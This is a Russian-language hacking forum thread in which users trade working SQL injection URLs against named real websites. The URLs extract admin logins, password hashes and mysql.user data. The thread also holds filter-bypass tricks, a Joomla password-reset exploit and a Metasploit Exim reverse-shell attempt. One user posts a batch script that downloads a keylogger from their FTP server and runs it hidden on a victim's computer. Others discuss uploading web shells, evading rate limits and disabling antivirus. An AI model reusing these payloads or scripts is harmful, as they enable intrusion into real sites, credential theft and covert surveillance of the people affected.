FlaktW said:
Не получается вывести имя юзера.
http://www.oeaw.ac.at/oeaw_servlet/e_PersonenDetailsGeneric?id=12361+and+1=0+union+se lect+user,null,null,null,null,null,null,null,null, null,null,null+from+sys.dual--
http://www.oeaw.ac.at/oeaw_servlet/e_PersonenDetailsGeneric?id=12361+and+1=0+union+se lect+sys.login_user,null,null,null,null,null,null, null,null,null,null,null+from+sys.dual--


можно попробовать вслепую:


Code:
http://www.oeaw.ac.at/oeaw_servlet/PersonenDetailsGeneric?id=12361+AND+ASCII(SUBSTR(( SELECT+SYS.LOGIN_USER+FROM+DUAL),1,1))=87

user:WWW

Есть простенькая SQL-иньекция, но сайт фильтрует(и сразу банит айпишник) все урлы, в которых проскакивает слово "admin_".

Т.е. запрос


Code:
http://site.com/index.php?id=-1+UNION+SELECT+1,concat_ws(0x3a,user,pass),3+from+ admin_users/*

фильтруется. Остальные запросы идут без проблем. Идеи, как обойти?

Через POST скрипт параметры не берет.

Nek1t said:
Есть простенькая SQL-иньекция, но сайт фильтрует(и сразу банит айпишник)
все
урлы, в которых проскакивает слово "admin_".
Т.е. запрос

Code:
http://site.com/index.php?id=-1+UNION+SELECT+1,concat_ws(0x3a,user,pass),3+from+ admin_users/*

фильтруется. Остальные запросы идут без проблем. Идеи, как обойти?
Через POST скрипт параметры не берет.



Линк в личку.

TreV@N said:
Смотри в title
http://www.truvor.ru/news.php?id_new=-91+union+select+1,2,3,4,version(),6,7,8,9--


спасибо, я вот хотел изнать названия колонок при помощи

information_shema но там написано што такой процес запрещон,

а што дальше в таком случае я могу сделать?

и дайте плиз ссылку на нормальную статью о там как при скуле залить шелл

qaz said:
спасибо, я вот хотел изнать названия колонок при помощи
information_shema но там написано што такой процес запрещон,
а што дальше в таком случае я могу сделать?
и дайте плиз ссылку на нормальную статью о там как при скуле залить шелл


клац (https://antichat.live/threads/104591/)

уже милионный раз перемалывается этот вопрос, поиcком можете научится пользоватся? здец просто полнeйший..обленилась молодежь

Кто знает как юзать вложенные запросы в мускул 4?)

Т.е имеем запрос

/**/or/**/1/**/group/**/by/**/concat(version(),floor(rand(0)*2))having/**/min(0)/**/or/**/1/*

все норм,Версию выведет,но попытаемся выдрать данные из существующей таблы admin допустим,летит эррор

ЗЫ:Интересно не мне одному

BaleHoK said:
Кто знает как юзать вложенные запросы в мускул 4?)
Т.е имеем запрос
/**/or/**/1/**/group/**/by/**/concat(version(),floor(rand(0)*2))having/**/min(0)/**/or/**/1/*
все норм,Версию выведет,но попытаемся выдрать данные из существующей таблы admin допустим,летит эррор
ЗЫ:Интересно не мне одному


Подзапросы в MySQL начали поддерживаться начиная с версии 4.1

Помогите определить версию БД.

http://www.procasapanama.com/detalle.php?id=-29+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19+--+

FlaktW said:
Помогите определить версию БД.
http://www.procasapanama.com/detalle.php?id=-29+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19+--+


Здесь нет уязвимости

Помогите найти:

1)Кол-во таблиц

2)пароль админа

http://www.alestilocuquita.com/descripcion.php?id=-347'+and+(select*from(select+count(*)from(select+1 +union+select+2+union+select+3)x+group+by+concat(m id((select+count(*)+from+INFORMATION_SCHEMA.TABLES +limit+1,1),1,64),floor(rand(0)*2)))z)+--+

FlaktW

http://www.alestilocuquita.com/descripcion.php?id=-347' and(select 1 from(select count(*),concat((select (select (SELECT concat_ws(0x3a,usuarios.usuario,usuarios.clave) FROM `orlando_cuiquita`.usuarios LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

Дальше перебирай лимитом юзверов

А вот вопрос, когда есть стандартная инъекция, то нельзя ли в подзапросе выполнить UPDATE?

Можно ли что то сделать в таких случаях

http://www.omelhordamoda.com.br/modafeminina.asp?CatID=80%27

http://www.siliconaction.com.br/registro/secao.mv?nomearquivo=[]

http://rasta.com.br/loja/index.php?page=shop.product_details%27&flypagep[]=shop.flypage%27&product_id=4685%27&category_id=8%27&manufacturer_id=0%27&option=com_virtuemart&Itemid=1%27

[Ozzi]

В первом случае - скуля http://www.omelhordamoda.com.br/modafeminina.asp?CatID=1'

БД - MSAccess

Вот статья про эту субд /threadnav50550-1.html

А в остальных 2ух просто раскрытие я так понял.


fl00der said:
А вот вопрос, когда есть стандартная инъекция, то нельзя ли в подзапросе выполнить UPDATE?


Нет,нельзя.Апдейт встречается довольно редко,также как и обход авторизации.

~d0s~ said:
[Ozzi]
В первом случае - скуля http://www.omelhordamoda.com.br/modafeminina.asp?CatID=1'
БД - MSAccess
Вот статья про эту субд /threadnav50550-1.html


Почитал попробовал но чет не раскручивается (

Как переделать этот запрос

' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(VERSION(), 1, 63), FLOOR(RAND(0)*2))) --

так что б он вывел table_name из information_schema

"]
[Ozzi] said:
Как переделать этот запрос
' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(VERSION(), 1, 63), FLOOR(RAND(0)*2))) --
http://i64.servimg.com/u/f64/12/44/55/09/school10.gif
так что б он вывел table_name из information_schema


' or 1 group by concat((select table_name from information_schema.tables limit 0,1),floor(rand(0)*2)) having min(0) or 1 -- 1

Фараон said:
' or 1 group by concat((select table_name from information_schema.tables limit 0,1),floor(rand(0)*2)) having min(0) or 1 -- 1




Ступил.. Спасибо!!!

Делаю такой запрос


Code:
select column_name from information_schema.columns where table_name='User'

мне выдает там 5 значенй логин пароль и тд , делаю дальше так


Code:
select логин from User -

меня бросает на главную страницу почему?

"]
[Ozzi] said:
Делаю такой запрос

Code:
select column_name from information_schema.columns where table_name='User'

мне выдает там 5 значенй логин пароль и тд , делаю дальше так

Code:
select логин from User -

меня бросает на главную страницу почему?


Проверьте количество записей:


Code:
select count(*) from User

Потом проверь, в какой базе таблица:


Code:
select table_schema from information_schema.tables where table_name='User'

Потом запросом:


Code:
select password from table_schema.User -

Выводи данные

Линк скинь.

"]
[Ozzi] said:
Делаю такой запрос

Code:
select column_name from information_schema.columns where table_name='User'

мне выдает там 5 значенй логин пароль и тд , делаю дальше так

Code:
select логин from User -

меня бросает на главную страницу почему?


причин может быть несколько, мб таблица в другой базе, тогда вопрос будет фелс, и будет редирект

возможно что там фильтр на определенные слова..

а еще много чего возможно,.. анализируй сайт

смотри на какие слова ругается

Konqi said:
причин может быть несколько, мб таблица в другой базе, тогда вопрос будет фелс, и будет редирект
возможно что там фильтр на определенные слова..
а еще много чего возможно,.. анализируй сайт
смотри на какие слова ругается


А как мне узнать в той ли базе таблица?

"]
[Ozzi] said:
А как мне узнать в той ли базе таблица?


table_schema

Gorev said:
table_schema



А пример с использованием можно?)

"]
[Ozzi] said:
А пример с использованием можно?)


select table_schema from information_schema.tables where table_name='идем_читать_маны_по_с кулям'

http://www.totalbhakti.com/shop.php?cid=2'

Помогите расскурутить чучуть) а то не получается \ =

GroM88

http://www.totalbhakti.com/shop.php?cid=2+or+1+group+by+concat(version(),floo r(rand(0)*2))having+min(0)+or+1--

error based

mysql юзверы (дада,майскул доступен на чтение)

http://www.totalbhakti.com/shop.php?cid=2+and(select+1+from(select+count(*),c oncat((select+(select+(SELECT+concat_ws(0x3a,user, password,file_priv)+from+mysql.user+limit+0,1) )+from+information_schema.tables+limit+0,1),floor( rand(0)*2))x+from information_schema.tables+group+by+x)a)+and+1=1

Глупый вопрос) но все же)

Какие запросы использовать в скуле что бы просматривать таблицы из определенной БД?

ну т.е. information_schema.tables выводит все таблицы из всех бд)

а мне надо посмотреть таблицы из определенной бд)

Помогите раскрутить)

http://www.grieger-boote.de/product_info.php?products_id=3934'

"]
[Ozzi] said:
Помогите раскрутить)
http://www.grieger-boote.de/product_info.php?products_id=3934'


http://www.grieger-boote.de/product_info.php?products_id=3934' or 1 group by concat((select version()),floor(rand(0)*2)) having min(0) or 1 -- 1

Фараон said:
http://www.grieger-boote.de/product_info.php?products_id=3934' or 1 group by concat((select version()),floor(rand(0)*2)) having min(0) or 1 -- 1



Спасибо но тогда вопрос почему здесь не катит так же ?

http://www.drachenshop.de/product_info.php?products_id=555'

имеется один сервак с старым ядром, хочу порутать.. делаю бек-коннект, коннект доходит но сразу же отрубает меня.. пробовал биндить порты (53, 81, 31337) - то же самое. есть идеи?

:."]
.:[melkiy]:. said:
имеется один сервак с старым ядром, хочу порутать.. делаю бек-коннект, коннект доходит но сразу же отрубает меня.. пробовал биндить порты (53, 81, 31337) - то же самое. есть идеи?


попробуй другие порты, мне повезло с этими. 8000, 31336


GroM88 said:
Глупый вопрос) но все же)
Какие запросы использовать в скуле что бы просматривать таблицы из определенной БД?
ну т.е. information_schema.tables выводит все таблицы из всех бд)
а мне надо посмотреть таблицы из определенной бд)



select table_name from information_schema.tables where table_schema='перечитай_маны_по_с� �улям'

http://www.webmallindia.com/gifts/productlist.php?catid=-203%20+union+select+1,2,3,4,column_name,6,7,8%20fr om%20information_schema.columns%20where%20table_na me=0x5472616e73616374%20limit%2011,1

Возможно ли вывести любое поле из этой таблицы ?

"]
[Ozzi] said:
Помогите плиз , нигде не нашел инфы и склонен что нельзя


можно!


Code:
http://www.webmallindia.com/gifts/productlist.php?catid=-203+union+select+unhex%28hex%28group_concat%28id,0 x3a,action,0x3a,adminid,0x3a,tablename,0x3a,record _id,0x3a,actiontime%29%29%29+from+admin_transactio n%20--+




Code:
http://www.webmallindia.com/gifts/productlist.php?catid=-203+union+select+unhex%28hex%28group_concat%28cd_i d,0x3a,cd_name,0x3a,cd_catid,0x3a,cd_gen,0x3a,cd_l an,0x3a,cd_make,0x3a,cd_typ,0x3a,cd_flag,0x3a,cd_i mg,0x3a,cd_desc,0x3a,cd_inline_desc,0x3a,cd_price, 0x3a,cd_discount,0x3a,cd_vendor,0x3a,cd_approve%29 %29%29+from+cd

Подскажите как залить шелл, в CMS Santafox, стоят фильтры на все!

Пытаюсь через добавление картинок/видео, выкидывает ошибку, пробовал разными методами, нефига, все перепробовал.

Помогите может кто работал с этой КМСкой, или знает иные способы заливки шелла?

"]
[Ozzi] said:
Помогите раскрутить скулю тут http://www.drachenshop.de/product_info.php?products_id=256%27


Тут нет скули.

такс давайте выносим какие нить изменения!, с этого дня здесь не постим скули вида id=1'

я все равно их буду удалять.

здесь помогают раскрутить багу, если есть какие нить не понятные моменты, пишите, "вот делаю запрос не получается" или "подобрал калонки, вывода нет" или хз что там

но не пишите, помогите раскрутить ид=1' =\вам это не онлайн инжектор.

Всем привет

Не так давно решил заняться sql инжектами. много читал, много думал... не в этом суть Проблем с нахождением и раскручиванием нету... Проблема в другом - в 90% случаев от баз толку ноль, ничего хорошего в них не находится Соответственно сайтик остается без шелла Не порядок ) Посоветуйте - как бы все же средствами скуля залить на этот сайт что нибудь...

Sl1ng3R said:
Всем привет
Не так давно решил заняться sql инжектами. много читал, много думал... не в этом суть
Проблем с нахождением и раскручиванием нету... Проблема в другом - в 90% случаев от баз толку ноль, ничего хорошего в них не находится
Соответственно сайтик остается без шелла
Не порядок ) Посоветуйте - как бы все же средствами скуля залить на этот сайт что нибудь...



у некоторых от начало заниматся скулями до заливки шеллов и превращения их в ликвид уходят годы...способоб заливки тысячи и зависит от КМС, админки, состояние сервера и тд и тп..тебе тут целый мануал выложить что ли?

ЗЫ. Забыл сказать вам начинающим скулерам, сайты которые вы хекаете..давно уже перехеканы до вас...так что заливка шелла вам многого не даст...ну конечно за рeдким исключением .

Gorev said:
у некоторых от начало заниматся скулями до заливки шеллов и превращения их в ликвид уходят годы...способоб заливки тысячи и зависит от КМС, админки, состояние сервера и тд и тп..тебе тут целый мануал выложить что ли?
ЗЫ. Забыл сказать вам начинающим скулерам, сайты которые вы хекаете..давно уже перехеканы до вас...так что заливка шелла вам многого не даст...ну конечно за рeдким исключением .


Я и не спорю что новичек И прекрасно знаю что я знаю и умею пока дай бог процентов 10%... Просто большинство пользуется стандартной схемой - инж -> поиск базы с пассом -> заливка/поиск как залить шелл из админки. С этим все понятно.

Меня интересует что делать если в базе ничего хорошего не обнаружено, админки вообще нету... Т.е. доступ есть только к скулю...

P.S. Писать подробный мануал я и не прошу - прошу пнуть в нужную сторону

проблема при проведении атаки :

Service Temporarily Unavailable

The FutureQuest SRC (Spider Rate Control) module will refuse your requests for the next 6.00 seconds.

You have made too many requests per second.

не даёт дампить есть какой нибудь софт со сменой айпи каждые 3 секунды? например что бы сокс шёл по кругу

Sl1ng3R said:
Я и не спорю что новичек
И прекрасно знаю что я знаю и умею пока дай бог процентов 10%... Просто большинство пользуется стандартной схемой - инж -> поиск базы с пассом -> заливка/поиск как залить шелл из админки. С этим все понятно.
Меня интересует что делать если в базе ничего хорошего не обнаружено, админки вообще нету... Т.е. доступ есть только к скулю...
P.S. Писать подробный мануал я и не прошу - прошу пнуть в нужную сторону


если нет полезной инфы в виде акков админов и нет админки, впридачу если прав на заливку через скулю нет..то как ты думаешь что можно сделать с таким сайтом и куда тебя пнуть?

Koren said:
проблема при проведении атаки :
Service Temporarily Unavailable
The FutureQuest SRC (Spider Rate Control) module will refuse your requests for the next 6.00 seconds.
You have made too many requests per second.
не даёт дампить есть какой нибудь софт со сменой айпи каждые 3 секунды? например что бы сокс шёл по кругу


ты хоть прочитал что тебе ошибка выдала? где написанно что тебе айпи заблочили?

Gorev said:
если нет полезной инфы в виде акков админов и нет админки,
впридачу если прав на заливку через скулю нет..
то как ты думаешь что можно сделать с таким сайтом и куда тебя пнуть?


Вот в том и прикол - я пока не особо понимаю как увидеть эти права на заливку скулем и тем более как им воспользоваться

Sl1ng3R said:
много читал, много думал...




Sl1ng3R said:
Вот в том и прикол - я пока не особо понимаю как увидеть эти права на заливку скулем и тем более как им воспользоваться


Ну значит плохо читал ты.

Gorev said:
ты хоть прочитал что тебе ошибка выдала? где написанно что тебе айпи заблочили?


дык кто говорит что его заблочили? дело в том что останавливается дамп каждые 6 секунд и обрывается

Sl1ng3R said:
Вот в том и прикол - я пока не особо понимаю как увидеть эти права на заливку скулем и тем более как им воспользоваться



клац (https://antichat.live/threads/104591/)

видимо нихрена ты не читал никаких мануалов если даже этого не знаешь...проверить права на запись в скуле это практически одно из важных действий..и в любом мане по скулям описанно что и как

Koren said:
дык кто говорит что его заблочили? дело в том что останавливается дамп каждые 6 секунд и обрывается



хорошо, поставлю вопрос по другому, что тебе даст смена айпи каждые 3 секунды?

Gorev said:
хорошо, поставлю вопрос по другому, что тебе даст смена айпи каждые 3 секунды?


пока сокс будет живой даст сдампить мне базу без обрыва

Koren said:
пока сокс будет живой даст сдампить мне базу без обрыва


а что тебя держит наваять скрипт на пхп? если ты так уверен что это панацея для твоего случая? и еще...вручную иногда получается лучше чем прогой.

Gorev said:
а что тебя держит наваять скрипт на пхп? если ты так уверен что это панацея для твоего случая? и еще...вручную иногда получается лучше чем прогой.


не обладаю знаниями пхп мен.

дамп через лимит в ручную будет долгим

Как залить сплоит, если стоит фильтр?

MastaBass1 said:
Как залить сплоит, если стоит фильтр?


какой фильтр? 0о

рассказывайте по подробнее

Jer1cho said:
*81079B801EB089EA4A18B5BC5C60B571D3EB071A — что это за тип хеша (из mysql.user[password])?
И еще вопрос, как можно обойти фильтрацию на слово select? SeLeCT и подобное не помагает.


Хеш - MySQL 5


MySQL5
признак: верхний регистр символов
root:*94BDCEBE19083CE2A1F959FD02F964C7Af4CfC29
*32FD2FB910CC84D8E710B431E1C208514F56D9EF
7F44978F28CCD7874293693FD73F4BDDD64321E1

*81079B801EB089EA4A18B5BC5C60B571D3EB071A — что это за тип хеша (из mysql.user[password])?


Вот ты не поверишь.... этот тип называется MySQL 4.1/MySQL 5 хеш

По поводу фильтрации тут это было, полистай этот топик назад...

што можно сделать имея подобную ошибку инклуда

http://sexfotka.us/service/

Вопрос собвственно вот в чем. Раскручиваю blind sql inj, достал юзера, в information_schema, не все определяются таблицы, а те что определяются в них все пусто. Что делать? db mysql 5.0.77

2qaz пути и только думаю

2Lijzer если есть доступ к information_schema.schemata, то смотри в какой базе таблицы

как вариант либо ты чтото неправильно делаешь, либо она реально пустая

inoxpoint.ru/news.php?nid=66+union+select+1,2,table_name,4,5,6, 7,8+from+INFORMATION_SCHEMA.TABLES--

взгляните на ошибку, как быть в таком случае?

qaz said:
inoxpoint.ru/news.php?nid=66+union+select+1,2,table_name,4,5,6, 7,8+from+INFORMATION_SCHEMA.TABLES--
взгляните на ошибку, как быть в таком случае?


здесь 4 версия MYSQL,в ней нет INFORMATION_SCHEMA

http://theictect.com/rss/daily_deal.php?c=3

вот blind inj, база mysql, в information_schema нет таблиц с юзерами, подскажите что делать? помимо inf_sch присутствуют, еще 3 базы но там тыкать бесполезно.

Lijzer said:
Вопрос собвственно вот в чем. Раскручиваю blind sql inj, достал юзера, в information_schema, не все определяются таблицы, а те что определяются в них все пусто. Что делать? db mysql 5.0.77



Ищи SQL в другом месте , часто бывает , что у тебя прав нету это как вариант

ykktbltrn'0

wkpfx}q|e+6

Что это может быть за хешь?

InferNo23 said:
ykktbltrn'0
wkpfx}q|e+6
Что это может быть за хешь?


щелбан тебе по лбу !!! (https://antichat.live/threads/133785/)

Yellow said:
Ищи SQL в другом месте , часто бывает , что у тебя прав нету это как вариант


Выдрал с 2ой базы логины и пассы 4 админов, теперь ищу админку.

Lijzer

http://zoupon.com.au/admin/

не оно?

Lijzer said:
Выдрал с 2ой базы логины и пассы 4 админов, теперь ищу админку.


ну и где твой вопрос по уязвимостям? модеры потрите этот бред школьника и флуд..мой пост тоже под удаление..

http://iatp.md/index.php?what=nav&id=-1+union+select+1,convert(version()+using+latin1),3 +into+outfile+ae.txt--

подскажите пожалуйста что тут не то?

rootmd said:
http://iatp.md/index.php?what=nav&id=-1+union+select+1,convert(version()+using+latin1),3 +into+outfile+ae.txt--
подскажите пожалуйста что тут не то?


во первых ты должен указать полный путь к файлу, во вторых ты должен взять его в кавычки, в третих у тебя нет прав на чтение/запись файлов

так в этом и проблема....кавычки. не если нет прав ладно. спасибо!

joomla 1.5 exploit

1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm

2. Write into field "token" char ' and Click OK.

3. Write new password for admin

4. Go to url : target.com/administrator/

5. Login admin with new password

во время входа мне выдает ошибку неверный логин ???

Нашел xss, выполняю:


alert(document.cookie)


В алетре только половина кукав... И этого не достаточно что бы украсть сессию. В чем может быть проблема?

Mirrey said:
Нашел xss, выполняю:
В алетре только половина кукав... И этого не достаточно что бы украсть сессию. В чем может быть проблема?



Наверное, некоторые куки недоступны для javascriptа, то есть они с флагом HTTP-Only

wizzardl said:
joomla 1.5 exploit
1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm
2. Write into field "token" char ' and Click OK.
3. Write new password for admin
4. Go to url : target.com/administrator/
5. Login admin with new password
во время входа мне выдает ошибку неверный логин ???



Значит уязвимость исправлена.

Столкнулся с такой проблемой. Создал батник install.bat


Code:
MKDIR C:\hc
netsh firewall add allowedprogram C:\install.bat "DownloaderFTP" enable
echo download >key.txt
echo download >>key.txt
echo get inst_jasp.exe C:\hc\inst_jasp.exe >>key.txt
echo bye >>key.txt
ftp -s:C:\key.txt "ИП АДРЕС ФТП"
netsh firewall add allowedprogram C:\hc\inst_jasp.exe "Blaze" enable
attrib "C:\hc" +h
start C:\hc\inst_jasp.exe
del key.txt
del install.bat

Батник закачивает на комп жертвы кейлоггер с моего фтп. Если я запускаю у себя, то все норм, логи идут. А если на удаленном компе через cmd, то никаких логов нет =(

Проверил, файл на комп закачивает и вроде выполняет. Но, почему-то логов нет.

Darklamar said:
Столкнулся с такой проблемой. Создал батник install.bat

Code:
MKDIR C:\hc
netsh firewall add allowedprogram C:\install.bat "DownloaderFTP" enable
echo download >key.txt
echo download >>key.txt
echo get inst_jasp.exe C:\hc\inst_jasp.exe >>key.txt
echo bye >>key.txt
ftp -s:C:\key.txt "ИП АДРЕС ФТП"
netsh firewall add allowedprogram C:\hc\inst_jasp.exe "Blaze" enable
attrib "C:\hc" +h
start C:\hc\inst_jasp.exe
del key.txt
del install.bat

Батник закачивает на комп жертвы кейлоггер с моего фтп. Если я запускаю у себя, то все норм, логи идут. А если на удаленном компе через cmd, то никаких логов нет =(
Проверил, файл на комп закачивает и вроде выполняет. Но, почему-то логов нет.



ANTIVIRUS+FIREWALL

Антивира у него нету, фаерволла тоже (кроме стандартного, но в батнике просаны исключения)

Подскажите пожалуйста как создать shell и как им пользоватся

MikePro said:
Подскажите пожалуйста как создать shell и как им пользоватся


ну дорогой задал ты вопрос, шелл что бы создать надо в пхп или в другом веб языке шарить, но я подозреваю что тебя интересует как залить шелл (аплоад на сервер)..для этого прочитай -ка сначала все маны по багам на ачате, но остановись на скулях поболее.и через пару эдак месяцев если понятливый будешь , то узнаешь что такое шелл и с чем его едят..а пока кури маны..

MikePro said:
Подскажите пожалуйста как создать shell и как им пользоватся


Скинул ссылку на один шелл в пм. По теме: тебе необходимо его залить на удаленный сервер, а для этого ищи уязвимости.

Столкнулся со следующей проблемой. На сайте крутится Exim 4.69.

Вывод nmap:

25/tcp open smtp Exim smtpd 4.69

Пытаюсь использовать готовый эксплойт в Metsploit - http://www.metasploit.com/modules/exploit/unix/smtp/exim4_string_format

Вывод консоли:

msf > use unix/smtp/exim4_string_format

msf exploit(exim4_string_format) > set LHOST xxx

LHOST => xxx

msf exploit(exim4_string_format) > set RHOST yyy

RHOST => yyy

msf exploit(exim4_string_format) > set Payload generic/shell_reverse_tcp

Payload => generic/shell_reverse_tcp

msf exploit(exim4_string_format) > exploit

[-] Handler failed to bind to xxx:4444

Started reverse handler on 0.0.0.0:4444

Server: yyy ESMTP Exim 4.69 #1 Sun, 12 Dec 2010 11:00:32 -0600

220-We do not authorize the use of this system to transport unsolicited,

220 and/or bulk e-mail.

EHLO: yyy Hello xxx [xxx]

EHLO: 250-SIZE 52428800

EHLO: 250-PIPELINING

EHLO: 250-AUTH PLAIN LOGIN

EHLO: 250-STARTTLS

EHLO: 250 HELP

Determined our hostname is xxx and IP address is xxx

MAIL: 250 OK

RCPT: 550-xxx (xxx) [xxx] is currently

550-not permitted to relay through this server. Perhaps you have not logged

550-into the pop/imap server in the last 30 minutes or do not have SMTP

550 Authentication turned on in your email client.

DATA: 503-All RCPT commands were rejected with this error:

503-xxx (xxx.com) [xxx] is currently

503-not permitted to relay through this server. Perhaps you have not logged

503-into the pop/imap server in the last 30 minutes or do not have SMTP

503-Authentication turned on in your email client.

503 Valid RCPT command must precede DATA

Constructing initial headers ...

Constructing HeaderX ...

Constructing body ...

Sending 50 megabytes of data...

[-] Exploit exception: Broken pipe

Exploit completed, but no session was created.

Что это за Broken pipe такой? Кто-нибудь вообще пробовал этот сплойт?

На другом сервере выдает:

MAIL: 250 OK

RCPT: 550-"JunkMail rejected - xxx (xxx.com) 550-[xxx]:50524 is in an RBL, see 550 http://www.spamhaus.org/query/bl?ip=xxx"

[-] Exploit exception: end of file reached

Exploit completed, but no session was created.

Тут я тоже ничего не понимю

Может порт 4444 защищен?

4444 порт биндится на моей машине и с ним все ок

"Handler failed to bind to xxx:4444" походу не забиндился порт

http://www.alienzero.com/agent/resulttype.asp?probe='

Как ваще это крутить? Нашел по этой уязвимости http://1337db.com/exploits/15056

Подскажите плз.

Если верить вики, то Джет - это то же, что и Access, по идее так же должно и крутиться.

Мб стоит попробовать по этой статейке: /showthread.php?p=2193060 ?

З.Ы. Самому интересно.

Не выводяться таблицы!

http://www.copelandfurniture.com/subcategory.php?id=-1+/*!UnIoN+SeLeCt*/+1,2,3,4,5,table_name,7,8,9+from+information_schem a.tables+--+

FlaktW said:
Не выводяться таблицы!
http://www.copelandfurniture.com/subcategory.php?id=-1+/*!UnIoN+SeLeCt*/+1,2,3,4,5,table_name,7,8,9+from+information_schem a.tables+--+


http://www.copelandfurniture.com/subcategory.php?id=-1+/*!union*/+select+1,2,3,4,5,/*!table_name*/,7,8,9+from+information_schema.tables+limit+0,1+--+

FlaktW said:
Не выводяться таблицы!
http://www.copelandfurniture.com/subcategory.php?id=-1+/*!UnIoN+SeLeCt*/+1,2,3,4,5,table_name,7,8,9+from+information_schem a.tables+--+


http://www.copelandfurniture.com/subcategory.php?id=-1+/*!UnIoN+SeLeCt*/+1,2,3,4,5,/*!unhex%28hex%28table_name%29%29*/,7,8,9+from+information_schema.tables+--+

часто вижу как ты выкладываешь сюда скули недокрученные, а подумать чуток? вот тебе таблы, без лимита все сразу

Помогите, нашел уязвимость на сайте, залил shell, все отлично, прошло 8 дней и тут его запилили, точнее он остался, но при его вызове этот скрипт переходит в скачку, словно простой файл. Штакетник залить не дает, файлы других форматов спокойно открывает(тестил html), вот вопрос, как это обойти и есть ли шелы других форматов(html, shtml, asp)?

MastaBass1 said:
Помогите, нашел уязвимость на сайте, залил shell, все отлично, прошло 8 дней и тут его запилили, точнее он остался, но при его вызове этот скрипт переходит в скачку, словно простой файл. Штакетник залить не дает, файлы других форматов спокойно открывает(тестил html), вот вопрос, как это обойти и есть ли шелы других форматов(html, shtml, asp)?


php3,phtml,php5....

Gorev said:
php3,phtml,php5....


Попробовал, не помогает, все равно срубает, он просто расширение любое переводи в php и срубает, например если залить 1.phtml, на сервере он будет лежать как "1." и если переписать php, начинает скачивать....Какие еще есть варианты?

MastaBass1 said:
Попробовал, не помогает, все равно срубает, он просто расширение любое переводи в php и срубает, например если залить 1.phtml, на сервере он будет лежать как "1." и если переписать php, начинает скачивать....Какие еще есть варианты?


прописанно в .htaccess ..попробуй залить shell.php.jpg, ищи инклюды также на сайте..

Gorev said:
прописанно в .htaccess ..попробуй залить shell.php.jpg, ищи инклюды также на сайте..


Чудеса какие то, все та же проблема- стирает все после ".". Напишу в ПМ, поможешь?

DesCent said:
Если верить вики, то Джет - это то же, что и Access, по идее так же должно и крутиться.
Мб стоит попробовать по этой статейке: /showthread.php?p=2193060 ?
З.Ы. Самому интересно.


Чото не крутится, или кручу криво. Короче хелп плиз, а то у меня есть Н таких сайтов (из Гугла), было бы отлично раскрутить.

Буду весьма благодарен.

Каким образом можно отключить службу OpenService на Windows? Из-за нее не могу отключить службы антивирей на удаленном компе.

http://shop.guidesqld.org/store/showCart.shop

post

параметр idProduct=1082'

посмотрите кто ни буль есть ли уязвимость

Koren said:
http://shop.guidesqld.org/store/showCart.shop
post
параметр idProduct=1082'
посмотрите кто ни буль есть ли уязвимость


не увидел там уязвимости

Есть root пароль на сервак

a1tv.ru

там открыто всего 2 порта

80 и 443

не могу зацепиться,как попасть туда.

Le Fruit said:
не увидел там уязвимости


Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near '&'.

/includes/databaseFunctions.shop, line 31

по-моему кроме сообщение об ошибке, больше ничего полезного не вывести

www.redbox.sg/products.php?cat_id=-61+union+select+1,2,3,COLUMN_NAME,5,6,7,8,9,10,11, 12,13,14,15,16,17,18+FROM+INFORMATION_SCHEMA.COLUM NS%20WHERE%20TABLE_NAME='users'--

помогите плыз вывести столбцы

qaz said:
www.redbox.sg/products.php?cat_id=-61+union+select+1,2,3,COLUMN_NAME,5,6,7,8,9,10,11, 12,13,14,15,16,17,18+FROM+INFORMATION_SCHEMA.COLUM NS%20WHERE%20TABLE_NAME='users'--
помогите плыз вывести столбцы



http://www.redbox.sg/products.php?cat_id=-61+union+select+1,2,3,concat_ws%280x3a,user_name,p assword%29,5,6,7,8,9,10,11,%2012,13,14,15,16,17,18 +from+user--

нет там таблы users

http://www.redbox.sg/products.php?cat_id=-61+UNION+SELECT+1,2,3,%28SELECT+CONCAT%28TABLE_NAM E,0x3a,TABLE_SCHEMA%29+FROM+INFORMATION_SCHEMA.TAB LES+LIMIT+106,1%29,5,6,7,8,9,10,11,12,13,14,15,16, 17,18--

user:bdlik_redboxx

http://www.redbox.sg/products.php?cat_id=-61+UNION+SELECT+1,2,3,%28SELECT+COLUMN_NAME+FROM+I NFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x75736 572+LIMIT+1,1%29,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18--

стандартная скуля с стандартным выводом, прежде чем постить всякую херню, подумай 3 раза и почитай ман по скулям...

о, спс, получилось,

www.redbox.sg/products.php?%20cat_id=-61+union+select%20+1,2,3,COLUMN_NAME,5,6,7,8,9,10, 11,%2012,13,14,15,16,17,18+FROM%20+INFORMATION_SCH EMA.COLUMNS+WHERE+TABLE_NAME=0x75736572--

я понял свои ошибки, только вот вопрос,

0x75736572- што ето такое? Как вы из узер получили ети символы? И почему скуль принимает только их а узер,нет?

qaz said:
о, спс, получилось,
www.redbox.sg/products.php?%20cat_id=-61+union+select%20+1,2,3,COLUMN_NAME,5,6,7,8,9,10, 11,%2012,13,14,15,16,17,18+FROM%20+INFORMATION_SCH EMA.COLUMNS+WHERE+TABLE_NAME=0x75736572--
я понял свои ошибки, только вот вопрос,
0x75736572- што ето такое? Как вы из узер получили ети символы? И почему скуль принимает только их а узер,нет?



клац (https://antichat.live/threads/104591/)

я вроде тебе сказал что прежде чем постить тупые вопросы почитай мануал..там есть все ответы..видимо ты из категории что в танке...это sql hex и в мануале все это описанно в деталях..сколько можно одно и тоже спрашивать..может переименовать раздел из "Ваши вопросы по уязвимостям" на "помощь школоте по раскрутке скулей "

Gorev said:
клац (https://antichat.live/threads/104591/)
я вроде тебе сказал что прежде чем постить тупые вопросы почитай мануал..там есть все ответы..видимо ты из категории что в танке...это sql hex и в мануале все это описанно в деталях..сколько можно одно и тоже спрашивать..может переименовать раздел из "Ваши вопросы по уязвимостям" на "помощь школоте по раскрутке скулей "


ага, ок пойду почитаю,

ещо один вопрос,

